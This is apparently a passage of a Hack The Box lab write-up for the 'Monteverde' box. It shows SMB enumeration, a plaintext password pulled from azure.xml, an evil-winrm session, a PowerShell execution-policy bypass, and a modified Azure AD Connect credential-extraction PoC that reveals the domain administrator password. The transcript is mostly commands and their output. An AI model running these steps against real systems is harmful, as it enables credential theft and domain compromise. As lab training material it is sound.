user@kali:~/Documents/HTB-Labs/Monteverde$ impacket-smbclient MEGABANK/SABatchJobs:SABatchJobs@monteverde.htb
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

Type help for list of commands
# ls
[-] No share selected
# use users$
# ls
drw-rw-rw-          0  Fri Jan  3 08:12:48 2020 .
drw-rw-rw-          0  Fri Jan  3 08:12:48 2020 ..
drw-rw-rw-          0  Fri Jan  3 08:15:23 2020 dgalanos
drw-rw-rw-          0  Fri Jan  3 08:41:18 2020 mhope
drw-rw-rw-          0  Fri Jan  3 08:14:56 2020 roleary
drw-rw-rw-          0  Fri Jan  3 08:14:28 2020 smorgan
# cd mhope
# ls
drw-rw-rw-          0  Fri Jan  3 08:41:18 2020 .
drw-rw-rw-          0  Fri Jan  3 08:41:18 2020 ..
-rw-rw-rw-       1212  Fri Jan  3 09:59:24 2020 azure.xml
# get azure.xml
# cd ../roleary
# ls
drw-rw-rw-          0  Fri Jan  3 08:14:56 2020 .
drw-rw-rw-          0  Fri Jan  3 08:14:56 2020 ..
# cd ../smorgan
# ls
drw-rw-rw-          0  Fri Jan  3 08:14:28 2020 .
drw-rw-rw-          0  Fri Jan  3 08:14:28 2020 ..
# cd ../dgalanos
# ls
drw-rw-rw-          0  Fri Jan  3 08:15:23 2020 .
drw-rw-rw-          0  Fri Jan  3 08:15:23 2020 ..
# 

user@kali:~/Documents/HTB-Labs/Monteverde$ cat azure.xml 
��<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
    <Props>
      <DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
      <DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
      <G N="KeyId">00000000-0000-0000-0000-000000000000</G>
      <S N="Password">4n0therD4y@n0th3r$</S>
    </Props>
  </Obj>

Let's try this with evil-winrm and user mhope as this is the only normal user with admin rights per the information returned by enum4linux.

Group 'Azure Admins' (RID: 2601) has member: MEGABANK\mhope

EVIL-WINRM

user@kali:~/Documents/HTB-Labs/Monteverde$ evil-winrm -i monteverde.htb -u mhope -p '4n0therD4y@n0th3r$' -s ./ps1_scripts/ -e ./exe_files/

Evil-WinRM shell v2.0

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\mhope\Documents> 
 cd ../Desktop
*Evil-WinRM* PS C:\Users\mhope\Desktop> ls


    Directory: C:\Users\mhope\Desktop


Mode                LastWriteTime         Length Name                                                                                                                                                                                                    
----                -------------         ------ ----                                                                                                                                                                                                    
-ar---         1/3/2020   5:48 AM             32 user.txt                                                                                                                                                                                                


*Evil-WinRM* PS C:\Users\mhope\Desktop> Get-Content -Path .\user.txt
496197********************f212f2

We have found the user flag. At this point, we can try to escalate our privileges.

Privilege Escalation

After enumerating services, groups and accounts, there was a possibility this domain controller could have ADSync tasks to the assigned Azure Tenant, along with the Azure files found under mhope that are related to the AzureRM Context and TokenCache.dat.

This information points us to try and exploit AzureAD Connect and ADSync to extract the administrator account password.

Remember to verify the Execution Policy in PowerShell before running any script. Since we are in a PowerShell session through WinRM, we can leverage its commands or functions.

To verify the Execution Policy:

Get-ExecutionPolicy -List

To change it for the current user:

Set-ExecutionPolicy Bypass -Scope CurrentUser

Changing this without specifying the scope will failed if the user does not have Administrator privileges.

Following the blog Azure AD Connect for RedTeamers provided in the overview section, lead us to a few failed attempts:

*Evil-WinRM* PS C:\Users\mhope\Downloads> upload ./ps1_scripts/azuread_decrypt_msol.ps1
Info: Uploading ./ps1_scripts/azuread_decrypt_msol.ps1 to C:\Users\mhope\Downloads\azuread_decrypt_msol.ps1

Data: 2328 bytes of 2328 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\Users\mhope\Downloads> Get-ExecutionPolicy -List

        Scope ExecutionPolicy
        ----- ---------------
MachinePolicy       Undefined
   UserPolicy       Undefined
      Process       Undefined
  CurrentUser       Undefined
 LocalMachine    RemoteSigned


*Evil-WinRM* PS C:\Users\mhope\Downloads> Set-ExecutionPolicy Bypass -Scope CurrentUser
*Evil-WinRM* PS C:\users\mhope\Downloads> .\azuread_decrypt_msol.ps1
AD Connect Sync Credential Extract POC (@_xpn_)

powershell.exe : Exception calling "Open" with "0" argument(s): "A network-related or instance-specific error 
    + CategoryInfo          : NotSpecified: (Exception calli...specific error :String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
occurred while establishing a connection to SQL Server. The server was not found or was not 
accessible. Verify that the instance name is correct and that SQL Server is configured to allow 
remote connections. (provider: SQL Network Interfaces, error: 26 - Error Locating Server/Instance 
Specified)"
At C:\users\mhope\Downloads\shell.ps1:4 char:1
+ $client.Open()
+ ~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : SqlException
 
Exception calling "ExecuteReader" with "0" argument(s): "ExecuteReader requires an open and 
available Connection. The connection's current state is closed."
At C:\users\mhope\Downloads\shell.ps1:7 char:1
+ $reader = $cmd.ExecuteReader()
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : InvalidOperationException
 
You cannot call a method on a null-valued expression.
At C:\users\mhope\Downloads\shell.ps1:8 char:1
+ $reader.Read() | Out-Null
+ ~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [], RuntimeException
    + FullyQualifiedErrorId : InvokeMethodOnNull
 
You cannot call a method on a null-valued expression.
At C:\users\mhope\Downloads\shell.ps1:9 char:1
+ $key_id = $reader.GetInt32(0)
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [], RuntimeException
    + FullyQualifiedErrorId : InvokeMethodOnNull
 
You cannot call a method on a null-valued expression.
At C:\users\mhope\Downloads\shell.ps1:10 char:1
+ $instance_id = $reader.GetGuid(1)
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [], RuntimeException
    + FullyQualifiedErrorId : InvokeMethodOnNull
 
You cannot call a method on a null-valued expression.
At C:\users\mhope\Downloads\shell.ps1:11 char:1
+ $entropy = $reader.GetGuid(2)
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [], RuntimeException
    + FullyQualifiedErrorId : InvokeMethodOnNull
 
You cannot call a method on a null-valued expression.
At C:\users\mhope\Downloads\shell.ps1:12 char:1
+ $reader.Close()
+ ~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [], RuntimeException
    + FullyQualifiedErrorId : InvokeMethodOnNull
 
Exception calling "ExecuteReader" with "0" argument(s): "ExecuteReader requires an open and 
available Connection. The connection's current state is closed."
At C:\users\mhope\Downloads\shell.ps1:16 char:1
+ $reader = $cmd.ExecuteReader()
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : InvalidOperationException
 
You cannot call a method on a null-valued expression.
At C:\users\mhope\Downloads\shell.ps1:17 char:1
+ $reader.Read() | Out-Null
+ ~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [], RuntimeException
    + FullyQualifiedErrorId : InvokeMethodOnNull
 
You cannot call a method on a null-valued expression.
At C:\users\mhope\Downloads\shell.ps1:18 char:1
+ $config = $reader.GetString(0)
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [], RuntimeException
    + FullyQualifiedErrorId : InvokeMethodOnNull
 
You cannot call a method on a null-valued expression.
At C:\users\mhope\Downloads\shell.ps1:19 char:1
+ $crypted = $reader.GetString(1)
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [], RuntimeException
    + FullyQualifiedErrorId : InvokeMethodOnNull
 
You cannot call a method on a null-valued expression.
At C:\users\mhope\Downloads\shell.ps1:20 char:1
+ $reader.Close()
+ ~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [], RuntimeException
    + FullyQualifiedErrorId : InvokeMethodOnNull
 
Cannot convert argument "guidEntropy", with value: "", for "LoadKeySet" to type "System.Guid": 
"Cannot convert null to type "System.Guid"."
At C:\users\mhope\Downloads\shell.ps1:24 char:1
+ $km.LoadKeySet($entropy, $instance_id, $key_id)
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodException
    + FullyQualifiedErrorId : MethodArgumentConversionInvalidCastArgument
 

Unhandled Exception: System.AccessViolationException: Attempted to read or write protected memory. This is often an indication that other memory is corrupt.
   at CKeyManager.GetActiveCredentialKey(CKeyManager* , CKey** )
   at Microsoft.DirectoryServices.MetadirectoryServices.Cryptography.KeyManager.GetActiveCredentialKey(Key& ppkey)
   at CallSite.Target(Closure , CallSite , Object , PSReference )
   at System.Dynamic.UpdateDelegates.UpdateAndExecute2[T0,T1,TRet](CallSite site, T0 arg0, T1 arg1)
   at System.Management.Automation.Interpreter.DynamicInstruction`3.Run(InterpretedFrame frame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(InterpretedFrame frame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(InterpretedFrame frame)
   at System.Management.Automation.Interpreter.Interpreter.Run(InterpretedFrame frame)
   at System.Management.Automation.Interpreter.LightLambda.RunVoid1[T0](T0 arg0)
   at System.Management.Automation.DlrScriptCommandProcessor.RunClause(Action`1 clause, Object dollarUnderbar, Object inputToProcess)
   at System.Management.Automation.DlrScriptCommandProcessor.Complete()
   at System.Management.Automation.CommandProcessorBase.DoComplete()
   at System.Management.Automation.Internal.PipelineProcessor.DoCompleteCore(CommandProcessorBase commandRequestingUpstreamCommandsToStop)
   at System.Management.Automation.Internal.PipelineProcessor.SynchronousExecuteEnumerate(Object input)
   at System.Management.Automation.Runspaces.LocalPipeline.InvokeHelper()
   at System.Management.Automation.Runspaces.LocalPipeline.InvokeThreadProc()
   at System.Management.Automation.Runspaces.PipelineThread.WorkerProc()
   at System.Threading.ExecutionContext.RunInternal(ExecutionContext executionContext, ContextCallback callback, Object state, Boolean preserveSyncCtx)
   at System.Threading.ExecutionContext.Run(ExecutionContext executionContext, ContextCallback callback, Object state, Boolean preserveSyncCtx)
   at System.Threading.ExecutionContext.Run(ExecutionContext executionContext, ContextCallback callback, Object state)
   at System.Threading.ThreadHelper.ThreadStart()

Basically the SQL connection did not work. After digging a little, the syntax on the connection was not good due to the SQL version. We had to tweak the connection from:

$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Data Source=(localdb). \ADSync;Initial Catalog=ADSync"

To the following:

$server = 127.0.0.1; $db = "ADSync"; $client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Server = $server; Database = $db; Initial Catalog=$db; Integrated Security = True;"

Now, our second attempt after updating the uploaded script:

*Evil-WinRM* PS C:\Users\mhope\Downloads> upload ./ps1_scripts/azuread_decrypt_msol2.ps1
Info: Uploading ./ps1_scripts/azuread_decrypt_msol2.ps1 to C:\Users\mhope\Downloads\azuread_decrypt_msol2.ps1

Data: 2404 bytes of 2404 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\Users\mhope\Downloads> Get-ExecutionPolicy -List

        Scope ExecutionPolicy
        ----- ---------------
MachinePolicy       Undefined
   UserPolicy       Undefined
      Process       Undefined
  CurrentUser          Bypass
 LocalMachine    RemoteSigned


*Evil-WinRM* PS C:\Users\mhope\Downloads> .\azuread_decrypt_msol2.ps1
AD Connect Sync Credential Extract POC (@_xpn_)

Domain: MEGABANK.LOCAL
Username: administrator
Password: d0m@in4dminyeah!

We got the Administrator credentials used to configure Azure AD Connect, so now we need to login as the Administrator using impacket-smbclient again.

user@kali:~/Documents/HTB-Labs/Monteverde$ impacket-smbclient MEGABANK/Administrator:"d0m@in4dminyeah!"@monteverde.htb
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

Type help for list of commands
# shares
ADMIN$
azure_uploads
C$
E$
IPC$
NETLOGON
SYSVOL
users$
# use C$
# ls
drw-rw-rw-          0  Fri Jan  3 00:11:23 2020 $Recycle.Bin
drw-rw-rw-          0  Fri Jan  3 00:13:00 2020 Documents and Settings
-rw-rw-rw- 1476395008  Mon Jan 13 14:40:45 2020 pagefile.sys
drw-rw-rw-          0  Fri Jan  3 00:11:23 2020 PerfLogs
drw-rw-rw-          0  Fri Jan  3 08:28:53 2020 Program Files
drw-rw-rw-          0  Thu Jan  2 17:39:00 2020 Program Files (x86)
drw-rw-rw-          0  Fri Jan  3 07:47:44 2020 ProgramData
drw-rw-rw-          0  Fri Jan  3 00:13:02 2020 Recovery
drw-rw-rw-          0  Thu Jan  2 16:54:11 2020 System Volume Information
drw-rw-rw-          0  Fri Jan  3 08:24:36 2020 Users
drw-rw-rw-          0  Fri Jan  3 07:47:45 2020 Windows
# cd Users
# cd Administrator
# cd Desktop
# ls
drw-rw-rw-          0  Fri Jan  3 08:48:34 2020 .
drw-rw-rw-          0  Fri Jan  3 08:48:34 2020 ..
-rw-rw-rw-        282  Thu Jan  2 17:49:01 2020 desktop.ini
-rw-rw-rw-         32  Fri Jan  3 08:48:55 2020 root.txt
# get root.txt
# exit

root@CORP-VMGD13L12:~/Documents/HTB-Labs/Monteverde# cat root.txt 
129096********************04a0bc

And we have found the root flag!

Different Approach

This section was added on April 17, 2022 while reviewing my notes versus the approach I would have taken if I worked on this box now.

Another way to finish this box would've been by accessing the system through either impacket-smbexec or evil-winrm:

┌──(jxberrios 👿 back0ff)-[~/…/Monteverde]
└─$ evil-winrm -i monteverde.htb -u Administrator -p 'd0m@in4dminyeah!'

Evil-WinRM shell v3.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> Get-ChildItem -Path .


    Directory: C:\Users\Administrator\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----         1/2/2020   3:06 PM                SQL Server Management Studio
d-----         1/2/2020   3:10 PM                Visual Studio 2017
d-----         1/3/2020   5:28 AM                WindowsPowerShell


*Evil-WinRM* PS C:\Users\Administrator\Documents> Get-ChildItem -Path ..\


    Directory: C:\Users\Administrator


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---         1/2/2020   2:49 PM                3D Objects
d-r---         1/2/2020   2:49 PM                Contacts
d-r---         1/3/2020   5:48 AM                Desktop
d-r---         1/3/2020   5:28 AM                Documents
d-r---        5/17/2021   3:13 AM                Downloads
d-r---         1/2/2020   2:49 PM                Favorites
d-r---         1/2/2020   2:49 PM                Links
d-r---         1/2/2020   2:49 PM                Music
d-r---         1/2/2020   2:49 PM                Pictures
d-r---         1/2/2020   2:49 PM                Saved Games
d-r---         1/2/2020   2:49 PM                Searches
d-r---         1/2/2020   2:49 PM                Videos


*Evil-WinRM* PS C:\Users\Administrator\Documents> Get-ChildItem -Path ..\Desktop\


    Directory: C:\Users\Administrator\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---         1/3/2020   5:48 AM             32 root.txt


*Evil-WinRM* PS C:\Users\Administrator\Documents> Get-Content -Path ..\Desktop\root.txt
129096********************04a0bc

Closing Statements:

As demonstrated by Adam Chester in his blog, there is always a risk with new technologies and even worse when best practices are not followed. At every deployment, evaluate each potential risk and do not rush it.

In this scenario, Adam Chester's POC is able to retrieve the credentials used to configure and run Azure AD Connect, we had the ability to retrieve the credentials for an account capable of performing a DCSync. But, this would not be achieved if the server running the Azure AD Connect service was configured properly and no others associated to misconfigurations.

PreviousResolute NextSauna

Last updated 3 years ago

Was this helpful?